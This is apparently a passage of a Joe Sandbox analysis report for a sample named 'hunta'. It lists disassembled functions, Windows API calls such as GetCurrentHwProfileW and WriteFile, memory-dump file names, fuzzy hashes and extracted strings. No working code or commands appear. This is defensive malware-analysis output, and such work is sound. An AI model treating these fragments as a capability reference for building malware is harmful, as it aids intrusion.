API String ID: 2104809126-0
Opcode ID: d4c99a85598d8d0b3cef971f1f6799c445b8a86350e7aa20ad9e885b4c6a5606
Instruction ID: fe6d517b77163a7f41ed0c6c2f206456bcd86c3b2a705baeeee8a35962780b55
Opcode Fuzzy Hash: d4c99a85598d8d0b3cef971f1f6799c445b8a86350e7aa20ad9e885b4c6a5606
Instruction Fuzzy Hash: 83516BEB64C121BCB112C5912BACAFB976FE6C67303308876F407D6506E3D84F8A1471

Function 059B0747 Relevance: 1.8, APIs: 1, Instructions: 258COMMON

Download Yara Rule

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 059B07F7

Memory Dump Source

Source File: 00000002.00000002.3744948935.00000000059B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_59b0000_hunta[1].jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 6e3c55c5b36c27a7ca14da5ed018a37a66179a340e782d9a6f606e2ece807533
Instruction ID: 72e6147c6930457d46e0a988015c901c077f3fda4dd4a15ef0649766e13e1234
Opcode Fuzzy Hash: 6e3c55c5b36c27a7ca14da5ed018a37a66179a340e782d9a6f606e2ece807533
Instruction Fuzzy Hash: F5414AEB64D121BCB112C1912F6CAFB9B6FE6C67307308866F407D5906E3D94F8A2172

Function 059B0762 Relevance: 1.8, APIs: 1, Instructions: 255COMMON

Download Yara Rule

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 059B07F7

Memory Dump Source

Source File: 00000002.00000002.3744948935.00000000059B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_59b0000_hunta[1].jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 53756676d75eadc59a15d1b0818da8948e2959d2b8e84153fcdb22a0ee4180e9
Instruction ID: f0c1d0696e58b24ee95d92f9cfe138d16c7c3649818f28fb2b4b2f5136b6e19c
Opcode Fuzzy Hash: 53756676d75eadc59a15d1b0818da8948e2959d2b8e84153fcdb22a0ee4180e9
Instruction Fuzzy Hash: 26414AEB64D121BCB512C5912B6CAFB976FE6C67307308876F407D5906E3D84F8A2171

Function 00F72B5C Relevance: 1.7, APIs: 1, Instructions: 198fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,00000000,00F66747,?,00000000,00000000,00000000,?,00000000,?,00F5BC71,00F66747,00000000,00F5BC71,?,?), ref: 00F72CE1

Memory Dump Source

Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd

Yara matches

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: f496c688e027a4984a2dc3fa509217ff829ba4e14fc32113970571f89883861d
Instruction ID: 7fc1ea7240ab69b3bb1d1339d1c01d41f5ce7cd4f1044ac763dce4ba3538cb50
Opcode Fuzzy Hash: f496c688e027a4984a2dc3fa509217ff829ba4e14fc32113970571f89883861d
Instruction Fuzzy Hash: F061C672D00119AFDF52CFA8CC84EEE7BB9BF59314F148146E808A7216D775D901EBA2

Function 00EEB6B0 Relevance: 1.6, APIs: 1, Instructions: 135COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00EEB801

Memory Dump Source

Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: 617db6ab8b8d5904d46ca521fca4f6ec3a4692538c761b60814e4c8ab9871f96
Instruction ID: ec6b7c9382df2989adabf22140993b3c2888fb2ed7d9d347a16e649a417a7e61
Opcode Fuzzy Hash: 617db6ab8b8d5904d46ca521fca4f6ec3a4692538c761b60814e4c8ab9871f96
Instruction Fuzzy Hash: 1A4114729001599BCB15DF69DC806AF77A5EF84351F1402AAFD09EB301D730EE1197D1

Function 00F721D2 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(00000000,00000000,CF830579,?,00F720B9,00000000,CF830579,00FB1090,0000000C,00F72175,00F6627D,?), ref: 00F72228

Memory Dump Source

Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd

Yara matches

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: f7ad4fb95e49a0511f9b968fd955666959d8d460768f6215cd99ab25d61405dd
Instruction ID: d15c4f6e7aacb2759338d8afaae880060d29d9e9b997e65540583d386f8f9cf1
Opcode Fuzzy Hash: f7ad4fb95e49a0511f9b968fd955666959d8d460768f6215cd99ab25d61405dd
Instruction Fuzzy Hash: FB112533E1831416E66132746C45B7E77899F86734F35821BE91C9B0D3DAA9CC41B593

Function 00F6B71C Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(00000000,00000000,00FB0D48,00F5BC71,00000002,00F5BC71,00000000,?,?,?,00F6B826,00000000,?,00F5BC71,00000002,00FB0D48), ref: 00F6B758

Memory Dump Source

Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd

Yara matches

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 9b66cb97aace613b7b16aaaee8f9425dd7f36c1790a2a32a9497005413590343
Instruction ID: ab253e449f8fd0c220344d3fc75c35d2f289ecd0e56f55e04675b9f49dad1c3e
Opcode Fuzzy Hash: 9b66cb97aace613b7b16aaaee8f9425dd7f36c1790a2a32a9497005413590343
Instruction Fuzzy Hash: D101D232614219AFCF05DF69DC45DAE3B6ADBC5330B340208F811EB291EB75ED91AB90

Function 00F5C950 Relevance: 1.6, APIs: 1, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00E81FDE

Memory Dump Source

Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID:
API String ID: 2659868963-0
Opcode ID: c43e6a2c52f10a9ab91064b4662632c6afd3483d7d672ce1e1d4c2cd8e04f89c
Instruction ID: 8e284151a410b9810a7ae53205a82c131659d526c254da4e6a4837a46bce8c57
Opcode Fuzzy Hash: c43e6a2c52f10a9ab91064b4662632c6afd3483d7d672ce1e1d4c2cd8e04f89c
Instruction Fuzzy Hash: AB01493680030D6BCB14BBA8DC018897BECDE01365B548221FF0DEA492FB70E999A7D1

Function 00F73AB3 Relevance: 1.5, APIs: 1, Instructions: 40memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,00F5ADBC,?,?,00F73439,00000001,00000364,?,00000006,000000FF,?,00F5DD3B,?,?,?,?), ref: 00F73AF5

Memory Dump Source

Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 8e0e43ecc85dabc1f3c6749f91575188b3dd43fc2bdbf459d5c14865f69f3c66
Instruction ID: 59cb2061909fc8caf29dc3c87a6b38c65f74558986de7b18a7fe05ebbd602103
Opcode Fuzzy Hash: 8e0e43ecc85dabc1f3c6749f91575188b3dd43fc2bdbf459d5c14865f69f3c66
Instruction Fuzzy Hash: A0F0E936A4422576AB217A3A8C06B5B3B48DF81770B19C113EC4C97085CB24DE00B6E7

Function 00F744ED Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,00F5DD3B,?,?,?,?,?,00E82D8D,00F5ADBC,?,?,00F5ADBC), ref: 00F7451F

Memory Dump Source

Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: d892e5083f3f2165d3a3ef8b951d4d9ad0654d81f4e65f33c4e46841476680bd
Instruction ID: cb2b17657a623b4b9d197f19c38868db51741b35911862c1f2951d55725f059a
Opcode Fuzzy Hash: d892e5083f3f2165d3a3ef8b951d4d9ad0654d81f4e65f33c4e46841476680bd
Instruction Fuzzy Hash: A3E09272A4122567EA213A799C01B6B3689DF457B0F1E8223EC4CA70D1DB64ED00B5A7

Function 059C00DF Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3744999866.00000000059C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_59c0000_hunta[1].jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 785fc114a2f96f74efe93cc29a7f1f873952e51f44a221ef06a4315c20b350d5
Instruction ID: 56a43a61d058ff8f67973a31833984e9a51f68801b9f0302d0af04b72947c816
Opcode Fuzzy Hash: 785fc114a2f96f74efe93cc29a7f1f873952e51f44a221ef06a4315c20b350d5
Instruction Fuzzy Hash: FB11C6EB188210BE6102D1851B9C5FEBE6FE5C7630B3188BFF807D6502F2C44E192272

Function 059C010B Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3744999866.00000000059C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_59c0000_hunta[1].jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dda01014435949fdeba920b6323516d61f93ba7c258c6172588644832c8de96d
Instruction ID: 4f3064e03e8cb175694377c1caeec2b9fcbdf39d7287d99eb7cf4e3f927a4906
Opcode Fuzzy Hash: dda01014435949fdeba920b6323516d61f93ba7c258c6172588644832c8de96d
Instruction Fuzzy Hash: 7501D6AB288210BE5102D189578C5FEFFAFA6C7631B3088BEF547D6502F1D44A091272

Function 059C013E Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3744999866.00000000059C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_59c0000_hunta[1].jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a2868428b264b7fba942a12f9da717c1d697436f5dfc319eec9affd52bb81ab
Instruction ID: 41d53241d29116d2f664e0f1106ad8c4fb69d42719378f9d192c3bc2f581c67a
Opcode Fuzzy Hash: 3a2868428b264b7fba942a12f9da717c1d697436f5dfc319eec9affd52bb81ab
Instruction Fuzzy Hash: CBF049A768C214FF9301A5A5578D2EEBFAB68C7270F3498BDF80386407F18546095252

Function 059C018C Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3744999866.00000000059C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_59c0000_hunta[1].jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6078b07951343164deb9918a4bb9e54a66788fd184f4f23b29a28cac0613cd89
Instruction ID: 66025e515d25c65450698a3fc9509e19bf1fcf4c8dd581f4787c6ddcaa463c5c
Opcode Fuzzy Hash: 6078b07951343164deb9918a4bb9e54a66788fd184f4f23b29a28cac0613cd89
Instruction Fuzzy Hash: 34017BB354C300AFC301DBA5578C1ACBFA6AEC7230B3488AFE0428B103F69597265352

Function 059C0183 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3744999866.00000000059C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_59c0000_hunta[1].jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3964fc2f509bec0ceffb7a224ff2163ebe8ffca2f7b3aae737a21965784abfba
Instruction ID: 2fb0236733e8ce71874a679598558637b528f6e4a10552487b83df9234b69585
Opcode Fuzzy Hash: 3964fc2f509bec0ceffb7a224ff2163ebe8ffca2f7b3aae737a21965784abfba
Instruction Fuzzy Hash: C6F0E5A76C8204AE1201A2E1575D2FDBE5AA4C7570B7088BFF8079A802F1C14B5952A3

Non-executed Functions

Function 00F0B800 Relevance: 18.5, APIs: 3, Strings: 7, Instructions: 970COMMON

Download Yara Rule

Strings

Inf, xrefs: 00F0C06F
+, xrefs: 00F0BEB0
gfff, xrefs: 00F0C40D
NaN, xrefs: 00F0BF69
-Inf, xrefs: 00F0C05F
, xrefs: 00F0C0C5, 00F0C0EE, 00F0C142, 00F0C167
+Inf, xrefs: 00F0C066

Memory Dump Source

Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd

Yara matches

Similarity

API ID:
String ID: $+$+Inf$-Inf$Inf$NaN$gfff
API String ID: 0-2577472133
Opcode ID: 2a99f7f2853bf9e3f2ecdb70eeedf5b0f9f7bdfac73671d280014f405bf538b3
Instruction ID: 83e117f737565c281914596df8c4721f64d4c42c898848524f9156d079fa423e
Opcode Fuzzy Hash: 2a99f7f2853bf9e3f2ecdb70eeedf5b0f9f7bdfac73671d280014f405bf538b3
Instruction Fuzzy Hash: 5082C0719087818FD725CF28C45036BBBE1AFDA354F048A5EE8CA97292D774C945EB82

Function 00F5A450 Relevance: 9.2, Strings: 7, Instructions: 490COMMON

Download Yara Rule

Strings

MATCH, xrefs: 00F5A81B, 00F5A829, 00F5A849, 00F5A84A, 00F5A860
automatic extension loading failed: %s, xrefs: 00F5A963
BINARY, xrefs: 00F5A682, 00F5A691, 00F5A6AB, 00F5A6ED
NOCASE, xrefs: 00F5A704
sqlite_rename_table, xrefs: 00F5A7F7
no such vfs: %s, xrefs: 00F5A661
RTRIM, xrefs: 00F5A6C5

Memory Dump Source

Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd

Yara matches

Similarity

API ID:
String ID: BINARY$MATCH$NOCASE$RTRIM$automatic extension loading failed: %s$no such vfs: %s$sqlite_rename_table
API String ID: 0-1885142750
Opcode ID: b7f4343af3bf642d70101135f96eacdf9134ea28baf7bfc0486aaed9570785cd
Instruction ID: 5fc91a512e3106891f6946a2250403ddf9aa64b5f3d7882afaf5340627875c17
Opcode Fuzzy Hash: b7f4343af3bf642d70101135f96eacdf9134ea28baf7bfc0486aaed9570785cd
Instruction Fuzzy Hash: F3024AB0F007049FE720CF54DC85B2677E0AF44715F14462CEE4A97292E7B9EA58EB92

Function 00E9A100 Relevance: 7.3, Strings: 4, Instructions: 2299COMMON

Download Yara Rule

Strings

131, xrefs: 00E9A32B, 00E9A33B
50500, xrefs: 00E9A2A5
%s|%s, xrefs: 00E9A347
type must be boolean, but is , xrefs: 00E9C171, 00E9C1A2, 00E9C265

Memory Dump Source

Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
